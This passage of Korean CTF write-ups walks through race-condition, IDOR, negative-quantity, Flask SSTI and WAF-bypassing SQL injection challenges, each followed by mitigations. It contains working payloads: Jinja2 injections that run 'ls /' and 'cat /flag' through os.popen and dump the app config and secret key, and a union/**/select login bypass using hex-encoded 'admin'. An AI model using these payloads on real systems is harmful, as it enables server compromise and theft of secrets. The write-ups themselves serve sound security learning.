- 카운터 변수 접근이 동기화되지 않아 값이 비정상적으로 증가.
지연 함수 사용:
- sleep(0.1) 함수는 데이터 충돌 가능성을 증가.
- 요청이 처리되기 전 다른 요청이 카운터에 접근.

보안 대책

1. 데이터 동기화

락(Lock) 메커니즘:
- 요청 처리 중 변수 접근을 제한.
- Flask에서는 threading.Lock을 사용하여 자원 보호 가능.

2. 비동기 큐 사용

요청 데이터를 큐에 저장하고, 순차적으로 처리:
- Python에서는 Redis나 Celery 같은 큐 시스템 활용.

3. 요청 처리 제한

요청 간 시간 간격 조정:
- 특정 사용자가 과도한 요청을 보낼 경우 차단.
IP 기반의 Rate Limiting 적용.

결론

과정 요약

/increase 엔드포인트의 레이스 컨디션 취약점 분석.
Python threading 모듈로 동시 다발적 요청 전송.
카운터 값 비정상적 증가 유발 후 플래그 획득.

플래그

K0{Cl1ck_m00oor3_F4st3r_t0_3XPL01T!!!}

12.2 IDOR

wogho — Wed, 22 Jan 2025 13:08:45 +0900

IDOR란?

Insecure Direct Object References (IDOR)는 웹 애플리케이션에서 발생하는 보안 취약점으로, 인증된 사용자가 다른 사용자의 데이터나 리소스에 접근할 수 있도록 허용하는 문제입니다.

취약점 특징

보통 URL, 요청 파라미터, 또는 쿠키에 포함된 식별자(ID) 값이 제대로 검증되지 않을 때 발생.
사용자가 자신의 권한 범위를 벗어나 다른 사용자의 데이터를 열람하거나 조작 가능.

문제 해결 과정

1. 회원가입 및 로그인

시작: 웹사이트에 회원가입 후 로그인.
로그인 후 개인 게시물만 확인 가능한 상태에서 취약점 여부를 조사.

2. 게시물 ID 확인

URL 분석:
- 게시물 접근 시 /post/{ID} 형태의 URL 사용:
  
  /post/11
이 구조는 ID 값이 다른 사용자의 게시물에 접근 가능하다는 가능성을 제시.

3. IDOR 취약점 확인

테스트:
- URL의 ID 값을 임의로 변경:
  
  /post/12
결과:
- 내가 작성하지 않은 다른 사용자의 게시물에 접근 가능.
- 이는 서버가 사용자의 권한을 제대로 검증하지 않는다는 것을 의미.

4. 첫 번째 게시물 접근

목표: 플래그가 포함된 게시물 찾기.
URL을 /post/1로 변경하여 첫 번째 게시물에 접근:

/post/1
결과:
- 첫 번째 게시물 본문에 플래그가 포함되어 있었음.

취약점 분석

문제 원인

권한 검증 부족:
- 서버가 요청을 처리할 때, 사용자가 해당 리소스에 접근할 권한이 있는지 확인하지 않음.
식별자 노출:
- 리소스에 대한 고유 ID가 클라이언트에게 직접 노출.

보안 대책

서버 측 권한 검증:
- 요청을 처리하기 전에 사용자가 해당 리소스에 접근할 권한이 있는지 확인.
- 예: 게시물 소유자와 요청 사용자가 동일한지 확인.
식별자 보안 강화:
- ID를 예측 불가능한 값으로 대체:
  - UUID(Universally Unique Identifier) 또는 해시 값 사용.
로깅 및 모니터링:
- 의심스러운 요청 패턴(예: ID 순차 증가 요청)을 탐지하고 대응.

12.1 Business_logic_error

wogho — Wed, 22 Jan 2025 12:56:17 +0900

목표

서버의 비즈니스 로직 취약점을 이용하여 잔액을 조작하고, 고가의 플래그를 성공적으로 구매.

문제 분석

애플리케이션 동작

상품 구매 기능: 사용자는 잔액 내에서만 상품 구매 가능.
플래그 가격: 플래그는 매우 높은 가격(예: 9,999,999원)으로 설정.
기본적으로 제공된 잔액으로는 플래그 구매 불가.

초기 확인

정상적인 구매 시도:
- 잔액 부족 시 구매 불가 메시지 출력.
- 서버에서 잔액을 검증하는 로직 존재.

공격 과정

1. Burp Suite를 사용한 요청 가로채기

분석 대상: /store/{item} 경로로 전송되는 POST 요청.
요청 내용:
- quantity: 구매 수량을 나타내며, 기본적으로 양수 값(예: 1)으로 설정.
- 요청 차단 시, 서버는 잔액 부족을 이유로 구매를 거부.

POST /store/flag HTTP/1.1
Host: war.knock-on.org:10016
Content-Length: 10
Content-Type: application/x-www-form-urlencoded

quantity=1

2. 음수 값 사용을 통한 취약점 탐지

테스트: quantity 값을 음수로 설정:
결과:
- 서버는 음수 수량을 처리하지 못하고, 잔액을 차감하는 대신 증가시킴.
- 예: 원래 잔액이 10,000원 → 음수 수량 요청 후 잔액이 수백만 원으로 증가.

quantity=-1

3. 플래그 구매

잔액을 조작한 후, 다시 정상적인 요청을 통해 플래그 구매:
결과:
- 서버는 충분한 잔액을 확인하고, 플래그 구매 허용.
- 플래그 획득 성공.

quantity=1

취약점 분석

취약점 유형

비즈니스 로직 에러:
- quantity 값에 대한 적절한 검증 부재.
- 음수 값이 비정상적으로 처리되어 잔액 조작 가능.

공격 가능 원인

수량 값 검증 부족:
- quantity 값이 음수일 경우의 처리 로직 미비.
서버 로직 결함:
- 음수 수량이 잔액 차감이 아닌 증가로 처리됨.

결론

과정 요약

취약점 유형: 비즈니스 로직 에러.
이용된 기법: 음수 값을 이용한 잔액 조작.
사용 도구: Burp Suite를 이용한 요청 분석 및 수정.

공격 흐름

Burp Suite에서 **수량 값(quantity)**을 음수로 수정.
음수 요청으로 잔액을 비정상적으로 증가.
충분한 잔액을 확보한 후 정상적으로 플래그 구매.

보안 대책

1. 입력 값 검증

quantity 값에 대한 철저한 검증:
- 양수 값만 허용.
- 범위를 벗어난 값은 에러 반환.

2. 서버 로직 개선

음수 값 처리 방지:
- 서버에서 음수 값 확인 후 차단.
- 예외적인 값에 대한 추가 로직 구현.

3. 로깅 및 모니터링

비정상적인 요청(예: 음수 값)의 탐지 및 알림.
잔액 변경 및 상품 구매 내역에 대한 상세 로깅.

부록: Burp Suite 사용법

Proxy 설정:
- Burp Suite의 Proxy를 활성화하고, 브라우저를 프록시에 연결.
요청 가로채기:
- 특정 요청을 수행한 후, Burp Suite에서 Intercept 활성화.
파라미터 수정:
- quantity=-1 등 값을 수정.
요청 전송:
- 수정된 요청을 Forward로 전송.

이번 사례는 입력 값 검증이 부족한 경우, 비즈니스 로직이 쉽게 악용될 수 있음을 보여줍니다. 이를 통해 입력 검증과 보안 로직 강화의 중요성을 다시 한번 확인할 수 있습니다.

8.2 SSTI - secretkey

wogho — Wed, 22 Jan 2025 12:52:39 +0900

문제 정의

Flask 애플리케이션에서 **SECRET_KEY**가 환경 변수 FLAG로 설정.
초기 분석 시, FLAG 값이 가짜 플래그로 보였으나 실제 플래그였음.
목표: SSTI 취약점을 이용해 SECRET_KEY를 노출시키고, 플래그를 획득.

문제 분석

Flask 애플리케이션 취약점

SSTI(Server-Side Template Injection)
- 사용자 입력이 Flask 템플릿 엔진 Jinja2에서 실행됨.
- 입력값이 서버에서 적절히 필터링되지 않고 실행되며 발생.
플래그 저장 방식
- SECRET_KEY에 환경 변수 FLAG 값이 설정됨.
- Flask의 config 객체를 통해 SECRET_KEY 값을 확인 가능.

플래그 획득 과정

1. SSTI 취약점 확인

기본 테스트: SSTI 취약점 여부를 확인하기 위해 템플릿 코드 테스트:
결과: 서버에서 49를 반환하며, 입력이 템플릿으로 실행됨을 확인.

{{ 7*7 }}

2. Flask 설정 접근

Flask에서 설정 값은 config 객체에 저장:
{{ config }}
테스트 코드: config.items()를 호출해 모든 설정 항목 확인:
{{ config.items() }}
결과:
- Flask 애플리케이션의 설정 값이 출력.
- SECRET_KEY 값에 FLAG 환경 변수 값이 포함됨.

3. 최종 플래그 획득 코드

다음 코드를 템플릿 인젝션 입력 필드에 삽입:

{{ config.items() }}
결과: SECRET_KEY 값이 출력되며 플래그 획득:

SSTI 취약점 정리

1. SSTI란?

서버 측 템플릿 처리 과정에서, 사용자의 입력이 템플릿 코드로 실행될 때 발생하는 취약점.
결과적으로:
- 민감 정보 노출
- 원격 코드 실행(RCE)
- 파일 시스템 접근 등의 문제를 유발.

2. Flask와 Jinja2

Flask의 기본 템플릿 엔진은 Jinja2.
{{ }}: 템플릿 내에서 Python 코드를 실행할 수 있는 구문.

3. 취약점 발생 원인

사용자의 입력이 템플릿 엔진을 통해 그대로 실행.
입력값에 대한 적절한 필터링 미비.

보안 대책

1. 사용자 입력 검증

템플릿에서 실행되는 사용자 입력을 화이트리스트로 검증.

2. render_template_string 사용 금지

Jinja2의 render_template_string 대신, 안전한 방식으로 템플릿을 렌더링:
- render_template 사용.
- 데이터는 템플릿 변수로 전달하며 직접 실행 방지.

3. 환경 변수 보호

민감한 정보를 환경 변수에 저장할 경우:
- 접근 제한 강화.
- 디버그 로그에 출력되지 않도록 설정.

8.1 SSTI - server flag

wogho — Wed, 22 Jan 2025 12:49:33 +0900

목표

Flask 애플리케이션에서 SSTI(Server-Side Template Injection) 취약점을 이용하여 서버의 중요한 정보에 접근하고, 환경 변수에 저장된 플래그를 획득.

문제 개요

Flask 애플리케이션 취약점

Flask 코드 분석 결과:
- render_template_string 메서드가 사용자의 입력을 그대로 템플릿으로 렌더링.
- 사용자 입력이 필터링 없이 서버 측에서 처리되는 것이 확인됨.
환경 변수:
- app.secret_key가 환경 변수 FLAG로부터 값을 받아 설정됨.
- 이를 통해 플래그가 환경 변수에 저장되어 있음을 유추.

플래그 획득 과정

1. SSTI 취약점 확인

기본 테스트: SSTI 여부를 확인하기 위해 간단한 템플릿 인젝션을 시도:
결과: 서버가 49를 반환하며, 사용자의 입력이 템플릿으로 렌더링됨을 확인.

{{7*7}}

2. 파일 시스템 탐색

명령어 실행: Flask의 템플릿 인젝션 취약점을 이용하여 파일 시스템 탐색을 수행:
결과: 파일 목록에서 /flag 파일의 존재를 확인.

{{ config.__class__.__init__.__globals__['os'].popen('ls /').read() }}

3. 플래그 파일 읽기

플래그 파일 접근: /flag 파일의 내용을 읽기 위해 다음 코드를 입력:
결과: 서버에서 /flag 파일 내용을 출력하며 플래그를 획득.

{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

최종 플래그 획득 코드

{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}

과정 요약

SSTI 취약점 확인:
- {{7*7}}과 같은 간단한 템플릿 코드로 SSTI 여부를 검증.
파일 시스템 탐색:
- ls 명령어를 통해 파일 시스템의 구조를 탐색하고 /flag 파일의 존재 확인.
플래그 파일 읽기:
- cat /flag 명령어로 플래그 파일 내용을 출력하여 플래그 획득.

취약점 분석 및 보안 대책

취약점 원인

render_template_string의 직접 사용: 사용자 입력이 필터링 없이 템플릿으로 렌더링되어 실행됨.
환경 변수 노출: 환경 변수 및 서버 파일에 대한 접근 제한 부족.

보안 대책

render_template_string 사용 금지:
- 사용자 입력을 직접 렌더링하는 메서드는 사용하지 않거나, 엄격한 필터링 적용.
환경 변수 보호:
- 환경 변수 값은 서버 외부에서 접근할 수 없도록 제한.
샌드박스 환경 적용:
- 서버에서 실행되는 코드를 격리된 환경에서 실행하여 민감한 정보 접근 방지.
입력 검증 강화:
- 사용자 입력 값에 대해 화이트리스트 기반의 검증을 수행하여 악성 입력 차단.

SSTI 취약점은 서버의 민감한 정보 노출과 데이터 탈취로 이어질 수 있는 심각한 문제입니다. 이 사례를 통해 Flask 애플리케이션 개발 시 보안 강화의 중요성을 다시 한번 확인할 수 있었습니다.

3.3 SQLi_WAF_3

wogho — Wed, 22 Jan 2025 12:45:48 +0900

목표

SQL 인젝션 기법을 사용하여 admin 계정으로 로그인.
LOGIN_FLAG를 획득.

환경

애플리케이션은 다음과 같은 필터링 리스트를 사용하여 SQL 인젝션 공격을 방어합니다:

필터링 리스트

filtering_list = ['or', 'and', '\'', '"', ' ']

or, and: 논리 연산자가 필터링됨.
작은 따옴표(')와 쌍따옴표("): 문자열을 감싸는 따옴표가 필터링됨.
공백( ): 공백(띄어쓰기)이 필터링됨.

SQL 쿼리 구조

SELECT * FROM user WHERE username = '{username}' AND password = '{password}'

사용자가 입력한 username과 password 값이 SQL 쿼리에 삽입되어 인증이 이루어짐.

우회 전략

1. 공백을 주석(//)으로 대체**

SQL에서는 주석(/**/)이 공백처럼 처리되므로, 필터링된 공백을 우회 가능.
SELECT와 FROM 같은 구문 사이에 공백 대신 /**/ 사용.

2. 작은 따옴표를 16진수로 대체

admin 문자열을 16진수 표현으로 변환:
- admin → 0x61646d696e

3. UNION SELECT로 쿼리 조작

UNION SELECT를 사용하여 추가적인 데이터를 삽입.
원하는 행을 반환하도록 결과를 조작.

최종 입력값

1. username 필드

빈 값 또는 무의미한 값 입력.

2. password 필드

union/**/select/**/1,0x61646d696e,0#

변환된 SQL 쿼리

이 입력값을 통해 쿼리는 다음과 같이 변환됩니다:

SELECT * FROM user WHERE username = '' AND password = 'union/**/select/**/1,0x61646d696e,0#';

쿼리 분석

union/**/select/**/1,0x61646d696e,0#:
1. union select: 기존 쿼리에 추가적인 행을 삽입.
2. 0x61646d696e: admin 문자열의 16진수 표현.
3. /**/: 공백 필터링을 우회하기 위해 주석을 사용.
4. #: 주석 처리 기호로 쿼리의 나머지 부분을 무시.
이 쿼리는 password 필드에 삽입되어, admin 계정의 인증을 우회.

결과

SQL Injection 성공:
- 필터링된 조건(공백, 따옴표 등)을 우회.
- admin 계정으로 로그인 성공.
- LOGIN_FLAG 획득.

결론

필터링된 조건

or, and, 작은 따옴표('), 쌍따옴표("), 공백( )이 필터링됨.

우회 방법

공백: /**/ 주석으로 대체.
작은 따옴표('): 16진수 표현(0x61646d696e)으로 대체.
**UNION SELECT**를 사용하여 쿼리 조작.

보안 권고

프리페어드 스테이트먼트(Prepared Statement) 사용: 사용자 입력값을 SQL 쿼리와 분리하여 실행.
입력 값 검증 강화: 16진수 표현, 주석 등을 통한 우회 가능성을 방지.
WAF 룰 업데이트: 주석 처리 및 16진수 표현 필터링 추가.

이번 공격은 WAF의 기본적인 필터링 규칙을 우회할 수 있음을 보여주며, 보다 강력한 보안 조치가 필요하다는 점을 강조합니다.